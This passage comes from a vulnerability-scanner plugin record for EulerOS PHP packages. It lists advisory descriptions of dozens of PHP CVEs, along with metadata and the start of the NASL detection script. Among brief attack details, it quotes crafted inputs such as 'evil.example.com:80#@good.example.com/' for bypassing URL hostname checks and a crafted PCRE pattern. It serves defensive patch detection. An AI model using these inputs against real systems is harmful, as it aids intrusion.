(2) SplObjectStorage, and (3) SplDoublyLinkedList, which are mishandled during unserialization.(CVE-2015-6831)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write occurs in bitset_set_range() during regular expression compilation due to an uninitialized variable from an incorrect state transition. An incorrect state transition in parse_char_class() could create an execution path that leaves a critical local variable uninitialized until it's used as an index, resulting in an out-of-bounds write memory corruption.(CVE-2017-9228)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in mbc_enc_len() during regular expression searching.\n Invalid handling of reg->dmin in forward_search_range() could result in an invalid pointer dereference, as an out-of-bounds read from a stack buffer.(CVE-2017-9227)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write or read occurs in next_state_val() during regular expression compilation. Octal numbers larger than 0xff are not handled correctly in fetch_token() and fetch_token_in_cc(). A malformed regular expression containing an octal number in the form of '\\700' would produce an invalid code point value larger than 0xff in next_state_val(), resulting in an out-of-bounds write memory corruption.(CVE-2017-9226)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.(CVE-2017-9224)\n\n - The exif_process_IFD_in_MAKERNOTE function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (out-of-bounds array access and memory corruption), obtain sensitive information from process memory, or possibly have unspecified other impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The php_url_parse_ex function in ext/standard/url.c in PHP before 5.5.38 allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via vectors involving the smart_str data type.(CVE-2016-6288)\n\n - Integer overflow in the php_html_entities function in ext/standard/html.c in PHP before 5.5.36 and 5.6.x before 5.6.22 allows remote attackers to cause a denial of service or possibly have unspecified other impact by triggering a large output string from the htmlspecialchars function.(CVE-2016-5094)\n\n - The get_icu_value_internal function in ext/intl/locale/locale_methods.c in PHP before 5.5.36, 5.6.x before 5.6.22, and 7.x before 7.0.7 does not ensure the presence of a '\\0' character, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a crafted locale_get_primary_language call.(CVE-2016-5093)\n\n - In PHP before 5.6.31, an invalid free in the WDDX deserialization of boolean parameters could be used by attackers able to inject XML for deserialization to crash the PHP interpreter, related to an invalid free for an empty boolean element in ext/wddx/wddx.c.(CVE-2017-11143)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.29 and 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document.(CVE-2016-9935)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string.(CVE-2016-9934)\n\n - The ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c.(CVE-2016-7414)\n\n - ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata.(CVE-2016-7412)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A SIGSEGV occurs in left_adjust_char_head() during regular expression compilation. Invalid handling of reg->dmax in forward_search_range() could result in an invalid pointer dereference, normally as an immediate denial-of-service condition.(CVE-2017-9229)\n\n - The openssl_random_pseudo_bytes function in ext/openssl/openssl.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 incorrectly relies on the deprecated RAND_pseudo_bytes function, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors.(CVE-2015-8867)\n\n - The sapi_header_op function in main/SAPI.c in PHP before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before 5.6.6 supports deprecated line folding without considering browser compatibility, which allows remote attackers to conduct cross-site scripting (XSS) attacks against Internet Explorer by leveraging (1) %0A%20 or (2) %0D%0A%20 mishandling in the header function.(CVE-2015-8935)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before 7.2.4. Dumpable FPM child processes allow bypassing opcache access controls because fpm_unix.c makes a PR_SET_DUMPABLE prctl call, allowing one user (in a multiuser environment) to obtain sensitive information from the process memory of a second user's PHP applications by running gcore on the PID of the PHP-FPM worker process.(CVE-2018-10545)\n\n - An issue was discovered in ext/phar/phar_object.c in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS on the PHAR 403 and 404 error pages via request data of a request for a .phar file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-5712.(CVE-2018-10547)\n\n - The Apache2 component in PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 allows XSS via the body of a 'Transfer-Encoding:\n chunked' request, because the bucket brigade is mishandled in the php_handler function in sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\n - PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead of the port number in the second argument of the function.(CVE-2017-7272 )\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, a stack-based buffer overflow in the zend_ini_do_op() function in Zend/zend_ini_parser.c could cause a denial of service or potentially allow executing code. NOTE: this is only relevant for PHP applications that accept untrusted input (instead of the system's php.ini file) for the parse_ini_string or parse_ini_file function, e.g., a web application for syntax validation of php.ini directives.(CVE-2017-11628)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR archive handler could be used by attackers supplying malicious archive files to crash the PHP interpreter or potentially disclose information due to a buffer over-read in the phar_parse_pharfile function in ext/phar/phar.c.(CVE-2017-11147)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, the openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function, which could lead to a crash of the PHP interpreter, related to an interpretation conflict for a negative number in ext/openssl/openssl.c, and an OpenSSL documentation omission.(CVE-2017-11144)\n\n - The locale_accept_from_http function in ext/intl/locale/locale_methods.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 does not properly restrict calls to the ICU uloc_acceptLanguageFromHTTP function, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a call with a long argument.(CVE-2016-6294)\n\n - Session fixation vulnerability in the Sessions subsystem in PHP before 5.5.2 allows remote attackers to hijack web sessions by specifying a session ID.(CVE-2011-4718)\n\n - Off-by-one error in the phar_parse_zipfile function in ext/phar/zip.c in PHP before 5.5.30 and 5.6.x before 5.6.14 allows remote attackers to cause a denial of service (uninitialized pointer dereference and application crash) by including the / filename in a .zip PHAR archive.(CVE-2015-7804)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - The exif_process_user_comment function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted JPEG image.(CVE-2016-6292)\n\n - The make_http_soap_request function in ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (type confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method in ext/soap/soap.c.(CVE-2016-3185)\n\n - Directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before 3.12.1 allows remote attackers to create arbitrary empty directories via a crafted ZIP archive.(CVE-2014-9767)\n\n - The phar_convert_to_other function in ext/phar/phar_object.c in PHP before 5.4.43, 5.5.x before 5.5.27, and 5.6.x before 5.6.11 does not validate a file pointer before a close operation, which allows remote attackers to cause a denial of service (segmentation fault) or possibly have unspecified other impact via a crafted TAR archive that is mishandled in a Phar::convertToData call.(CVE-2015-5589)\n\n - Directory traversal vulnerability in the PharData class in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to write to arbitrary files via a .. (dot dot) in a ZIP archive entry that is mishandled during an extractTo call.(CVE-2015-6833)\n\n - The phar_get_entry_data function in ext/phar/util.c in PHP before 5.5.30 and 5.6.x before 5.6.14 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a .phar file with a crafted TAR archive entry in which the Link indicator references a file that does not exist.(CVE-2015-7803)\n\n - Stack consumption vulnerability in GD in PHP before 5.6.12 allows remote attackers to cause a denial of service via a crafted imagefilltoborder call.(CVE-2015-8874)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP before 5.5.32, 5.6.x before 5.6.18, and 7.x before 7.0.3 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted TAR archive.(CVE-2016-2554)\n\n - The phar_parse_zipfile function in zip.c in the PHAR extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read and application crash) by placing a PK\\x05\\x06 signature at an invalid location.(CVE-2016-3142)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x before 7.0.10 skips invalid session names in a way that triggers incorrect parsing, which allows remote attackers to inject arbitrary-type session data by leveraging control of a session name, as demonstrated by object injection.(CVE-2016-7125)\n\n - The exif_process_IFD_in_TIFF function in ext/exif/exif.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles the case of a thumbnail offset that exceeds the file size, which allows remote attackers to obtain sensitive information from process memory via a crafted TIFF image.(CVE-2016-7128)\n\n - The get_icu_disp_value_src_php function in ext/intl/locale/locale_methods.c in PHP before 5.3.29, 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not properly restrict calls to the ICU uresbund.cpp component, which allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact via a locale_get_display_name call with a long first argument.(CVE-2014-9912)\n\n - Use-after-free vulnerability in the SPL unserialize implementation in ext/spl/spl_array.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to execute arbitrary code via crafted serialized data that triggers misuse of an array field.(CVE-2015-6832)\n\n - The make_http_soap_request function in ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 does not properly retrieve keys, which allows remote attackers to cause a denial of service (NULL pointer dereference, type confusion, and application crash) or possibly execute arbitrary code via crafted serialized data representing a numerically indexed _cookies array, related to the SoapClient::__call method in ext/soap/soap.c.(CVE-2015-8835)\n\n - The uloc_acceptLanguageFromHTTP function in common/uloc.cpp in International Components for Unicode (ICU) through 57.1 for C/C++ does not ensure that there is a '\\0' character at the end of a certain temporary array, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a call with a long httpAcceptLanguage argument.(CVE-2016-6293)\n\n - When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 it is possible to supply it with data what will cause it to read past the allocated buffer.\n This may lead to information disclosure or crash.(CVE-2019-11040)\n\n - When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer.\n This may lead to information disclosure or crash.(CVE-2019-11041)\n\n - When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer.\n This may lead to information disclosure or crash.(CVE-2019-11042)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-12-04T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : php (EulerOS-SA-2019-2438)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4718", "CVE-2014-9767", "CVE-2014-9912", "CVE-2015-5589", "CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-7803", "CVE-2015-7804", "CVE-2015-8382", "CVE-2015-8835", "CVE-2015-8867", "CVE-2015-8874", "CVE-2015-8879", "CVE-2015-8935", "CVE-2016-10397", "CVE-2016-2554", "CVE-2016-3141", "CVE-2016-3142", "CVE-2016-3185", "CVE-2016-4070", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-4543", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-6288", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6293", "CVE-2016-6294", "CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7128", "CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7414", "CVE-2016-7418", "CVE-2016-7480", "CVE-2016-9934", "CVE-2016-9935", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-16642", "CVE-2017-7272", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229", "CVE-2018-10545", "CVE-2018-10547", "CVE-2018-14851", "CVE-2018-17082", "CVE-2018-5712", "CVE-2019-11040", "CVE-2019-11041", "CVE-2019-11042", "CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:php", "p-cpe:/a:huawei:euleros:php-cli", "p-cpe:/a:huawei:euleros:php-common", "p-cpe:/a:huawei:euleros:php-gd", "p-cpe:/a:huawei:euleros:php-ldap", "p-cpe:/a:huawei:euleros:php-mysql", "p-cpe:/a:huawei:euleros:php-odbc", "p-cpe:/a:huawei:euleros:php-pdo", "p-cpe:/a:huawei:euleros:php-pgsql", "p-cpe:/a:huawei:euleros:php-process", "p-cpe:/a:huawei:euleros:php-recode", "p-cpe:/a:huawei:euleros:php-soap", "p-cpe:/a:huawei:euleros:php-xml", "p-cpe:/a:huawei:euleros:php-xmlrpc", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2438.NASL", "href": "https://www.tenable.com/plugins/nessus/131592", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131592);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2011-4718\",\n \"CVE-2014-9767\",\n \"CVE-2014-9912\",\n \"CVE-2015-5589\",\n \"CVE-2015-6831\",\n \"CVE-2015-6832\",\n \"CVE-2015-6833\",\n \"CVE-2015-7803\",\n \"CVE-2015-7804\",\n \"CVE-2015-8382\",\n \"CVE-2015-8835\",\n \"CVE-2015-8867\",\n \"CVE-2015-8874\",\n \"CVE-2015-8879\",\n \"CVE-2015-8935\",\n \"CVE-2016-10397\",\n \"CVE-2016-2554\",\n \"CVE-2016-3141\",\n \"CVE-2016-3142\",\n \"CVE-2016-3185\",\n \"CVE-2016-4070\",\n \"CVE-2016-4539\",\n \"CVE-2016-4540\",\n \"CVE-2016-4541\",\n \"CVE-2016-4542\",\n \"CVE-2016-4543\",\n \"CVE-2016-5093\",\n \"CVE-2016-5094\",\n \"CVE-2016-6288\",\n \"CVE-2016-6291\",\n \"CVE-2016-6292\",\n \"CVE-2016-6293\",\n \"CVE-2016-6294\",\n \"CVE-2016-7124\",\n \"CVE-2016-7125\",\n \"CVE-2016-7128\",\n \"CVE-2016-7411\",\n \"CVE-2016-7412\",\n \"CVE-2016-7414\",\n \"CVE-2016-7418\",\n \"CVE-2016-7480\",\n \"CVE-2016-9934\",\n \"CVE-2016-9935\",\n \"CVE-2017-11143\",\n \"CVE-2017-11144\",\n \"CVE-2017-11147\",\n \"CVE-2017-11628\",\n \"CVE-2017-12933\",\n \"CVE-2017-16642\",\n \"CVE-2017-7272\",\n \"CVE-2017-9224\",\n \"CVE-2017-9226\",\n \"CVE-2017-9227\",\n \"CVE-2017-9228\",\n \"CVE-2017-9229\",\n \"CVE-2018-10545\",\n \"CVE-2018-10547\",\n \"CVE-2018-14851\",\n \"CVE-2018-17082\",\n \"CVE-2018-5712\",\n \"CVE-2019-11040\",\n \"CVE-2019-11041\",\n \"CVE-2019-11042\",\n \"CVE-2019-11043\"\n );\n script_bugtraq_id(61929, 75974);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"EulerOS 2.0 SP2 : php (EulerOS-SA-2019-2438)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the php packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24\n and 7.3.x below 7.3.11 in certain configurations of FPM\n setup it is possible to cause FPM module to write past\n allocated buffers into the space reserved for FCGI\n protocol data, thus opening the possibility of remote\n code execution.(CVE-2019-11043)\n\n - The finish_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.6.31,\n 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to\n a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified\n impact on the integrity of PHP.(CVE-2017-12933)\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25\n and 7.x before 7.0.10 mishandles certain invalid\n objects, which allows remote attackers to cause a\n denial of service or possibly have unspecified other\n impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method\n call.(CVE-2016-7124)\n\n - The match function in pcre_exec.c in PCRE before 8.37\n mishandles the\n /(?:((abcd))|(((?:(?:(?:(?:abc|(?:abcdef))))b)abcdefghi\n )abc)|((*ACCEPT)))/ pattern and related patterns\n involving (*ACCEPT), which allows remote attackers to\n obtain sensitive information from process memory or\n cause a denial of service (partially initialized memory\n and application crash) via a crafted regular\n expression, as demonstrated by a JavaScript RegExp\n object encountered by Konqueror, aka\n ZDI-CAN-2547.(CVE-2015-8382)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x\n before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before\n 7.2.1. There is Reflected XSS on the PHAR 404 error\n page via the URI of a request for a .phar\n file.(CVE-2018-5712)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP\n before 5.6.37, 7.0.x before 7.0.31, 7.1.x before\n 7.1.20, and 7.2.x before 7.2.8 allows remote attackers\n to cause a denial of service (out-of-bounds read and\n application crash) via a crafted JPEG\n file.(CVE-2018-14851)\n\n - The SplObjectStorage unserialize implementation in\n ext/spl/spl_observer.c in PHP before 7.0.12 does not\n verify that a key is an object, which allows remote\n attackers to execute arbitrary code or cause a denial\n of service (uninitialized memory access) via crafted\n serialized data.(CVE-2016-7480)\n\n - ext/standard/var_unserializer.re in PHP before 5.6.26\n mishandles object-deserialization failures, which\n allows remote attackers to cause a denial of service\n (memory corruption) or possibly have unspecified other\n impact via an unserialize call that references a\n partially constructed object.(CVE-2016-7411)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in\n PHP before 5.6.12 mishandles driver behavior for\n SQL_WVARCHAR columns, which allows remote attackers to\n cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the\n odbc_fetch_array function to access a certain type of\n Microsoft SQL Server table.(CVE-2015-8879)\n\n - In PHP before 5.6.32, 7.x before 7.0.25, and 7.1.x\n before 7.1.11, an error in the date extension's\n timelib_meridian handling of 'front of' and 'back of'\n directives could be used by attackers able to supply\n date strings to leak information from the interpreter,\n related to ext/date/lib/parse_date.c out-of-bounds\n reads affecting the php_parse_date function. NOTE: this\n is a different issue than\n CVE-2017-11145.(CVE-2017-16642)\n\n - The exif_process_IFD_in_JPEG function in\n ext/exif/exif.c in PHP before 5.5.35, 5.6.x before\n 5.6.21, and 7.x before 7.0.6 does not validate IFD\n sizes, which allows remote attackers to cause a denial\n of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header\n data.(CVE-2016-4543)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 does not properly construct spprintf arguments,\n which allows remote attackers to cause a denial of\n service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header\n data.(CVE-2016-4542)\n\n - The grapheme_strpos function in\n ext/intl/grapheme/grapheme_string.c in PHP before\n 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6\n allows remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset.(CVE-2016-4541)\n\n - The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP before\n 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6\n allows remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset.(CVE-2016-4540)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 allows remote attackers to cause a denial of\n service (buffer under-read and segmentation fault) or\n possibly have unspecified other impact via crafted XML\n data in the second argument, leading to a parser level\n of zero.(CVE-2016-4539)\n\n - ** DISPUTED ** Integer overflow in the\n php_raw_url_encode function in ext/standard/url.c in\n PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before\n 7.0.5 allows remote attackers to cause a denial of\n service (application crash) via a long string to the\n rawurlencode function. NOTE: the vendor says 'Not sure\n if this qualifies as security issue (probably\n not).'(CVE-2016-4070)\n\n - Use-after-free vulnerability in wddx.c in the WDDX\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to cause a denial of service\n (memory corruption and application crash) or possibly\n have unspecified other impact by triggering a\n wddx_deserialize call on XML data containing a crafted\n var element.(CVE-2016-3141)\n\n - In PHP before 5.6.28 and 7.x before 7.0.13, incorrect\n handling of various URI components in the URL parser\n could be used by attackers to bypass hostname-specific\n URL checks, as demonstrated by\n evil.example.com:80#@good.example.com/ and\n evil.example.com:80?@good.example.com/ inputs to the\n parse_url function (implemented in the php_url_parse_ex\n function in ext/standard/url.c).(CVE-2016-10397)\n\n - Multiple use-after-free vulnerabilities in SPL in PHP\n before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before\n 5.6.12 allow remote attackers to execute arbitrary code\n via vectors involving (1) ArrayObject, (2)\n SplObjectStorage, and (3) SplDoublyLinkedList, which\n are mishandled during unserialization.(CVE-2015-6831)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A heap out-of-bounds write occurs in\n bitset_set_range() during regular expression\n compilation due to an uninitialized variable from an\n incorrect state transition. An incorrect state\n transition in parse_char_class() could create an\n execution path that leaves a critical local variable\n uninitialized until it's used as an index, resulting in\n an out-of-bounds write memory\n corruption.(CVE-2017-9228)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A stack out-of-bounds read occurs in\n mbc_enc_len() during regular expression searching.\n Invalid handling of reg->dmin in forward_search_range()\n could result in an invalid pointer dereference, as an\n out-of-bounds read from a stack buffer.(CVE-2017-9227)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A heap out-of-bounds write or read\n occurs in next_state_val() during regular expression\n compilation. Octal numbers larger than 0xff are not\n handled correctly in fetch_token() and\n fetch_token_in_cc(). A malformed regular expression\n containing an octal number in the form of '\\700' would\n produce an invalid code point value larger than 0xff in\n next_state_val(), resulting in an out-of-bounds write\n memory corruption.(CVE-2017-9226)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A stack out-of-bounds read occurs in\n match_at() during regular expression searching. A\n logical error involving order of validation and access\n in match_at() could result in an out-of-bounds read\n from a stack buffer.(CVE-2017-9224)\n\n - The exif_process_IFD_in_MAKERNOTE function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (out-of-bounds array access\n and memory corruption), obtain sensitive information\n from process memory, or possibly have unspecified other\n impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The php_url_parse_ex function in ext/standard/url.c in\n PHP before 5.5.38 allows remote attackers to cause a\n denial of service (buffer over-read) or possibly have\n unspecified other impact via vectors involving the\n smart_str data type.(CVE-2016-6288)\n\n - Integer overflow in the php_html_entities function in\n ext/standard/html.c in PHP before 5.5.36 and 5.6.x\n before 5.6.22 allows remote attackers to cause a denial\n of service or possibly have unspecified other impact by\n triggering a large output string from the\n htmlspecialchars function.(CVE-2016-5094)\n\n - The get_icu_value_internal function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.36,\n 5.6.x before 5.6.22, and 7.x before 7.0.7 does not\n ensure the presence of a '\\0' character, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a crafted locale_get_primary_language\n call.(CVE-2016-5093)\n\n - In PHP before 5.6.31, an invalid free in the WDDX\n deserialization of boolean parameters could be used by\n attackers able to inject XML for deserialization to\n crash the PHP interpreter, related to an invalid free\n for an empty boolean element in\n ext/wddx/wddx.c.(CVE-2017-11143)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.29 and 7.x before 7.0.14 allows\n remote attackers to cause a denial of service\n (out-of-bounds read and memory corruption) or possibly\n have unspecified other impact via an empty boolean\n element in a wddxPacket XML document.(CVE-2016-9935)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before\n 7.0.13 allows remote attackers to cause a denial of\n service (NULL pointer dereference) via crafted\n serialized data in a wddxPacket XML document, as\n demonstrated by a PDORow string.(CVE-2016-9934)\n\n - The ZIP signature-verification feature in PHP before\n 5.6.26 and 7.x before 7.0.11 does not ensure that the\n uncompressed_filesize field is large enough, which\n allows remote attackers to cause a denial of service\n (out-of-bounds memory access) or possibly have\n unspecified other impact via a crafted PHAR archive,\n related to ext/phar/util.c and\n ext/phar/zip.c.(CVE-2016-7414)\n\n - ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26\n and 7.x before 7.0.11 does not verify that a BIT field\n has the UNSIGNED_FLAG flag, which allows remote MySQL\n servers to cause a denial of service (heap-based buffer\n overflow) or possibly have unspecified other impact via\n crafted field metadata.(CVE-2016-7412)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A SIGSEGV occurs in\n left_adjust_char_head() during regular expression\n compilation. Invalid handling of reg->dmax in\n forward_search_range() could result in an invalid\n pointer dereference, normally as an immediate\n denial-of-service condition.(CVE-2017-9229)\n\n - The openssl_random_pseudo_bytes function in\n ext/openssl/openssl.c in PHP before 5.4.44, 5.5.x\n before 5.5.28, and 5.6.x before 5.6.12 incorrectly\n relies on the deprecated RAND_pseudo_bytes function,\n which makes it easier for remote attackers to defeat\n cryptographic protection mechanisms via unspecified\n vectors.(CVE-2015-8867)\n\n - The sapi_header_op function in main/SAPI.c in PHP\n before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before\n 5.6.6 supports deprecated line folding without\n considering browser compatibility, which allows remote\n attackers to conduct cross-site scripting (XSS) attacks\n against Internet Explorer by leveraging (1) %0A%20 or\n (2) %0D%0A%20 mishandling in the header\n function.(CVE-2015-8935)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x\n before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before\n 7.2.4. Dumpable FPM child processes allow bypassing\n opcache access controls because fpm_unix.c makes a\n PR_SET_DUMPABLE prctl call, allowing one user (in a\n multiuser environment) to obtain sensitive information\n from the process memory of a second user's PHP\n applications by running gcore on the PID of the PHP-FPM\n worker process.(CVE-2018-10545)\n\n - An issue was discovered in ext/phar/phar_object.c in\n PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before\n 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS\n on the PHAR 403 and 404 error pages via request data of\n a request for a .phar file. NOTE: this vulnerability\n exists because of an incomplete 